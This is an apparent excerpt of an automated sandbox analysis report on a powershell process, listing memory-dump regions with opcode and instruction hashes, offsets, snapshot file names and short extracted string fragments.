                                                        • Opcode Fuzzy Hash: 4fa43b1647cee4edb6d7daf6e18980f930285b477b6126207d01cdcd7c90a03c
                                                        • Instruction Fuzzy Hash: 4DF0DA75A001059FCB15CF9CD994AEEF7B1FF88324F208199E515A72A1C736EC52CB50
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9cb28f4bc716f78251276b677dc786a9a24d3401ecad7f1218ae1c3caf892d65
                                                        • Instruction ID: 9140fa22a139d15822fcde4af90ce91b74332d0a924c882b7c9cee3a40d85b54
                                                        • Opcode Fuzzy Hash: 9cb28f4bc716f78251276b677dc786a9a24d3401ecad7f1218ae1c3caf892d65
                                                        • Instruction Fuzzy Hash: E2F09774E0020A8FC780DF68D485AAEBBF1BF49214F5041A9D509DB321E730A955CB91
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2316165585.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4b00000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73eb84c35c44c485345aff72caf9608401ce58da905a42fd03f2e1efe22bb583
                                                        • Instruction ID: b6f664648ef8bf4c72e1f5e4301e94a97bbc5f3d3e173e29e6a538b507f254f1
                                                        • Opcode Fuzzy Hash: 73eb84c35c44c485345aff72caf9608401ce58da905a42fd03f2e1efe22bb583
                                                        • Instruction Fuzzy Hash: 92E092313407406FE301EB69E990AA9BBA2DFC5354B0441A9E501CBB68DF75EC868BA0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aab8edd835fa5dea4a582fbfd39efcbebc79e6e146568b5126351d5a7e5f760a
                                                        • Instruction ID: 7658fc05de66776a2410d6762838889dd4ed60ef24b954b288f61eb2b14eca78
                                                        • Opcode Fuzzy Hash: aab8edd835fa5dea4a582fbfd39efcbebc79e6e146568b5126351d5a7e5f760a
                                                        • Instruction Fuzzy Hash: 92F06DB4649341AFEB12CF10CC44A61BB72AB87315F29C0DAE5258F1A7C7769886CB11
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2315898639.0000000004A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A1D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_4a1d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f5db911821e225b26767201d03f1c809c8491fa8989dbd6255a8bcd657930271
                                                        • Instruction ID: 6873b4b34b95405c81a00c29cbedf8e55216ff18ab8f0409f3dc92b19d3ab299
                                                        • Opcode Fuzzy Hash: f5db911821e225b26767201d03f1c809c8491fa8989dbd6255a8bcd657930271
                                                        • Instruction Fuzzy Hash: 582127B1608200DFD704DF14D580F2AFBA9EBD4724F20C66ED50A4B261C379F446C662
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                                                        • API String ID: 0-459999756
                                                        • Opcode ID: 7b6f98b4f3e984583ddbb1e3e25e093ef9009c2fe3fc7a0ee0a83116fc78d2bd
                                                        • Instruction ID: 29e9d4bb127c8bc41262adb3d0c79ba7ba23d3dcf517497ef68cea32cc2957ba
                                                        • Opcode Fuzzy Hash: 7b6f98b4f3e984583ddbb1e3e25e093ef9009c2fe3fc7a0ee0a83116fc78d2bd
                                                        • Instruction Fuzzy Hash: 46A1F7B1B4021A9FCB24DF68CD4466ABBA2ABC5320F148859F815AF3D5CB31DD45C7B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-3512890053
                                                        • Opcode ID: 21a1611ef0610d43f15b8e9d2ad37c106e5819eea648741760e8b3cbe3923733
                                                        • Instruction ID: f6aa6e40dd1123d0d901c6a4c626cf3de2f7b8aaf47431de74140e08aae801e6
                                                        • Opcode Fuzzy Hash: 21a1611ef0610d43f15b8e9d2ad37c106e5819eea648741760e8b3cbe3923733
                                                        • Instruction Fuzzy Hash: 05C145B1F002068FDB288F7DD85066ABBE2AFC5210F24887BF425CB255DB35D956CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-788909730
                                                        • Opcode ID: ed093cadebdb312b7aeedcec854fa77c510a6fe4a0874137c2e9780b7a11ec85
                                                        • Instruction ID: 9fcea7a719d8f70bc8d0c60319e761ad4bd2bdc5985682731c400a6d6a20acd8
                                                        • Opcode Fuzzy Hash: ed093cadebdb312b7aeedcec854fa77c510a6fe4a0874137c2e9780b7a11ec85
                                                        • Instruction Fuzzy Hash: 49A116B1B002459FCB289F69D4406BABBE2ABC9710F24C56AF4258F354DF32D945CBD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                        • API String ID: 0-2822668367
                                                        • Opcode ID: 8c7481da79411eb3821f9305143af9734abc6076701426a2a6fd7eeea50bb142
                                                        • Instruction ID: 16ea34d86567f625fb82f49f86a804dc55e30b058c17bd9ecde632c25651a511
                                                        • Opcode Fuzzy Hash: 8c7481da79411eb3821f9305143af9734abc6076701426a2a6fd7eeea50bb142
                                                        • Instruction Fuzzy Hash: 1ED1A0B0A502189FD718DF98C554B9EBBB2AFC4300F20C469E5516F369CB76EC89CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                                                        • API String ID: 0-1682816917
                                                        • Opcode ID: ccc9f000d4e1e366049179e094502dd91c998b794dd32fa6ead42472c64cc988
                                                        • Instruction ID: 2e34b6f7496119bd0d65d68f2f682ea8f19014679dfdfa8078b7866852bcd3ca
                                                        • Opcode Fuzzy Hash: ccc9f000d4e1e366049179e094502dd91c998b794dd32fa6ead42472c64cc988
                                                        • Instruction Fuzzy Hash: EB6105B1B10205DFCB149F68D540A6AFBA2AFC9314F24C46AF8259F395CB31DD45CBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                        • API String ID: 0-3997570045
                                                        • Opcode ID: 4406a3deb108f6c040fc642a9b0e8b2484a588eb491a732085425dd22201f450
                                                        • Instruction ID: f540eccd46896304bac48e23fc9734aaf1bb2f07c8c05cb28556f56b52312cc1
                                                        • Opcode Fuzzy Hash: 4406a3deb108f6c040fc642a9b0e8b2484a588eb491a732085425dd22201f450
                                                        • Instruction Fuzzy Hash: 924104B1A04286EFDB248F14C545BF5BBF1AB8D710F2885AAF4358F295CB31D885CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                        • API String ID: 0-3272787073
                                                        • Opcode ID: 4e004a29420710b63cfa4dfce16aa70b506e65930766c17fe4782af85ed2ef03
                                                        • Instruction ID: 5cdb177908b9dcd57cc694cff051f8dfc5420edeebbdabb2156381b4b142f19c
                                                        • Opcode Fuzzy Hash: 4e004a29420710b63cfa4dfce16aa70b506e65930766c17fe4782af85ed2ef03
                                                        • Instruction Fuzzy Hash: EE3159F2784306CFDB244F698C00676BBA5AFC5630B24446BE472AA2C5CF36C455C772
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2825857601
                                                        • Opcode ID: 536bdf21f6f6d5a1cafa405ca8c961060359f78678b8df96cc45f0b7a936c1cf
                                                        • Instruction ID: d21d9c567abc869fdc0ce59c6219f9b7228b1550fea138a98b3492cd7d23ebad
                                                        • Opcode Fuzzy Hash: 536bdf21f6f6d5a1cafa405ca8c961060359f78678b8df96cc45f0b7a936c1cf
                                                        • Instruction Fuzzy Hash: 57218CF1E20206DBDB384F2EC544A65B7F6AF81661F58446BF8248B250CB35E9A4CA51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (o^q$(o^q$(o^q$(o^q
                                                        • API String ID: 0-1978863864
                                                        • Opcode ID: 0bf1d5c74c67faba37c44701a6ba105da1a6751b485718e5b25bdf4c31a274e2
                                                        • Instruction ID: 4d8f3b6603b84339ad96cadd9db8ad4804874a4ad4a7298b9e2319a9a8597c18
                                                        • Opcode Fuzzy Hash: 0bf1d5c74c67faba37c44701a6ba105da1a6751b485718e5b25bdf4c31a274e2
                                                        • Instruction Fuzzy Hash: 5EF146B170434ADFDB159F28D800BAABBB2AFC5320F14846AF5658F291DB35D845CBB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: f7a621bf8c5e08fc00384a0166edde10b0c8aeef95eff715792365d2e83c35f1
                                                        • Instruction ID: a9491e7786e668c2a5b38e8c164e88dd624b86c4914e4f981c8c61747871db2b
                                                        • Opcode Fuzzy Hash: f7a621bf8c5e08fc00384a0166edde10b0c8aeef95eff715792365d2e83c35f1
                                                        • Instruction Fuzzy Hash: A93139B1B103166BE7245A3D8C10B3B66DA5FC0B05F14882EF962CF395DD26DC4997A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: f766c3f14aca03ef020ceec5a06a43749e46620d8301b187041914ae418e4575
                                                        • Instruction ID: 1a8e353e1a2e4bc8ae49fe1b985e6d4b598491236c36dc2b49355d35a9d48750
                                                        • Opcode Fuzzy Hash: f766c3f14aca03ef020ceec5a06a43749e46620d8301b187041914ae418e4575
                                                        • Instruction Fuzzy Hash: F0217BB130030A5BD7381E3D9800B277BEBABC5750F24882AF469CF385DD36E8498361
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2321496862.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                        • API String ID: 0-2049395529
                                                        • Opcode ID: a181845b65bb2afd797a001aca00b9689512effa8180b47d0ea479ee9c9b06ed
                                                        • Instruction ID: 41d01175997d5b42b4cc56f9ef1251559affc7f18f6eb0a27ad51bdfe2bbcef0
                                                        • Opcode Fuzzy Hash: a181845b65bb2afd797a001aca00b9689512effa8180b47d0ea479ee9c9b06ed
                                                        • Instruction Fuzzy Hash: 1501D461B093898FC72B0A6858201616FB25FC351132A04D7D081CF36BCD188C49C7A7